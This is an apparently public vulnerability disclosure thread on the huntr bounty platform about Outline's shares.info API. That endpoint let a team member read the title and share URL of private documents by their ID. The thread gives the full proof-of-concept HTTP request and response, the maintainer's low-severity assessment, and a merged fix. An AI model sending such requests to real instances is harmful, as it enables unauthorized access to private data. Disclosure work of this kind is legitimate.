unprivileged user can get document details in outline/outline

Valid

Reported on

Jul 1st 2022


Description

unprivileged user can see document details of any document .

Proof of Concept

1. From admin account add a new user called user-B as member role .

2. Now from admin account create a private collection and dont share it with any member .Set bellow permisiion for this collection

Default Access --> No access

3. Now from admin account add new document to this collection . So, user-B should not see this document details .
Lets assume documentId is 1ad60950-9e50-4316-8cd9-6f4ff49d7f31 of this document .
4. Now from user-B account sent bellow request to get details of this document

POST /api/shares.info HTTP/1.1
Host: myacc.getoutline.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 68
X-Editor-Version: 12.0.0
Origin: https://myacc.getoutline.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6ImMzYTRjNzdhLWY4YjctNDJkMy05MjZhLTQzNWY3OTQ5ZDkwZSIsInR5cGUiOiJzZXNzaW9uIiwiaWF0IjoxNjU2Njg0Njg1fQ.UmVUcAfPXqhWuGI_i8qZemBwDpN5nZN6tovq_sMPnIA
Te: trailers
Connection: close
ACCOUNT: TEST2
.
{"documentId":"1ad60950-9e50-4316-8cd9-6f4ff49d7f31","apiVersion":4}

here change documentId with above documentId .
You can give documentId of any private collection document of any users .
response


{
  "data": {
    "id": "ec76aaf3-815d-4db8-a177-c5b4e124172c",
    "documentId": "1ad60950-9e50-4316-8cd9-6f4ff49d7f31",
    "documentTitle": "dcco2",
    "documentUrl": "/doc/dcco2-MphGaOA1Ls",
    "published": false,
    "url": "https://myacc.getoutline.com/share/ec76aaf3-815d-4db8-a177-c5b4e124172c",
    "createdBy": {
      "id": "09da9275-6dbc-48cd-9026-a3dc255c441c",
      "name": "myname",
      "avatarUrl": "https://outline-production-attachments.s3-accelerate.amazonaws.com/avatars/09da9275-6dbc-48cd-9026-a3dc255c441c/86867337-db3f-4713-97aa-505fa51be224",
      "color": "#9E5CF7",
      "isAdmin": true,
      "isSuspended": false,
      "isViewer": false,
      "createdAt": "2022-07-01T13:34:59.700Z",
      "updatedAt": "2022-07-01T19:40:32.477Z",
      "lastActiveAt": "2022-07-01T19:40:32.477Z"
    },
    "includeChildDocuments": false,
    "createdAt": "2022-07-01T16:39:48.101Z",
    "updatedAt": "2022-07-01T19:43:44.866Z"
  },
  "policies": [
    {
      "id": "ec76aaf3-815d-4db8-a177-c5b4e124172c",
      "abilities": {
        "read": true,
        "update": true,
        "revoke": false
      }
    }
  ],
  "status": 200,
  "ok": true
}

Impact

unprivileged user can get details of any document of any users using documentId.

We are processing your report and will contact the outline team within 24 hours. a month ago
We have contacted a member of the outline team and are waiting to hear back a month ago
Tom Moor
a month ago

Maintainer


So, the reproduction steps are:

  • The attacker must be on the same team
  • The document or one of it's parents must have a Share record in the database
  • The attacker must guess or otherwise obtain a UUID

The data that's leaked is just the document name and url path. The user information doesn't really count because you're already on the same team and can access that irregardless.

Does that sound right?

ranjit-git
a month ago

Researcher


The attacker must be on the same team

yes

\

The document or one of it's parents must have a Share record in the database

yes But this document is private . This document is created under a private collection by admin and collection has no other user/group assigned to it . Only admin has permission in this collection and Default Acces --> No Access for this collection .

\

The attacker must guess or otherwise obtain a UUID

id guess is not possible beacause it is long hash value .
There is two way that attacker can get UUID
1. Previously admin assign/share attacker to this document . Now attacker has permission and during this time attacker write-down the documentId . After that admin revoked access of attacker from this document .
So, attacker does not have permission to access this document but attacker already has the DocumentId .
2. documentId is leaked and attacker got that documentId .


\

The data that's leaked is just the document name and url path. The user information doesn't really count because you're already on the same team and can access that irregardless

yes , data leaked are Document title and url .
If admin modified the document title and then using this bug attacker can get document Title or url .

ranjit-git modified the report
a month ago
Tom Moor
a month ago

Maintainer


Okay, so TLDR:

If you've had access to a document before and held onto the ID then once you no longer have access you can use the API directly to find out any changes to the title.

ranjit-git
a month ago

Researcher


yes. leaked data are only title and share url

We have sent a follow up to the outline team. We will try again in 7 days. a month ago
Tom Moor modified the Severity from Medium to Low a month ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Tom Moor validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
ranjit-git
a month ago

Researcher


Does this bug does not have any security impact?

Tom Moor
a month ago

Maintainer


It's a good find and definitely a bug in the logic here, but the real-life impact is pretty much negligible.

ranjit-git
a month ago

Researcher


@maintainer so this report does not qualify for bounty reward?

We have sent a fix follow up to the outline team. We will try again in 7 days. a month ago
Tom Moor
a month ago

Maintainer


I don't know how the bounty amount works, I marked it as valid

ranjit-git
a month ago

Researcher


@maintainer If you directly mark the report as Low or None then it does not reward bounty.
But if you mark the report as Low by calculating CVSS score then it gives bounty.

Let me know if this report should deserve a bounty or not.

ranjit-git
a month ago

Researcher


@maintainer Bounty are assigned according to report severity and paid by huntr team .
Here is the bounty table \

High--->$900 Medium-->$300 Low--->$100

Tom Moor confirmed that a fix has been merged on da4a10 a month ago
The fix bounty has been dropped
shares.ts#L55-L307 has been validated
shares.ts#L2-L49 has been validated
shares.test.ts#L10-L736 has been validated
ranjit-git
a month ago

Researcher


@maintainer so this report does not qualify for bounty reward?

to join this conversation